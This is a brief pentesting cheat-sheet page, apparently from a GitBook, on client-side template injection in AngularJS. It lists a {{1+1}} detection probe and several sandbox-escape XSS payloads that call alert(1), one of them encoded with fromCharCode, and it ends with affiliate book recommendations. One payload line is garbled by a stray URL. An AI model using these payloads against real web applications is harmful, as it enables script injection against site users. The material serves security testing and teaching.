CSTI

Client Side Template Injection

Client-side template injection

x(97,108,101,114,116,40,49,41)) = alert(1)

{{x=http://valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}}

Angular

Angular

GitHub - tijme/angularjs-csti-scanner: Automated client-side template injection (sandbox escape/bypass) detection for AngularJS v1.x.GitHub

Detection:

{{1+1}}

XSS

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}

{{constructor.constructor('alert(1)')()}}

More payload

Pwnage Base

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more

• Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them

• Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.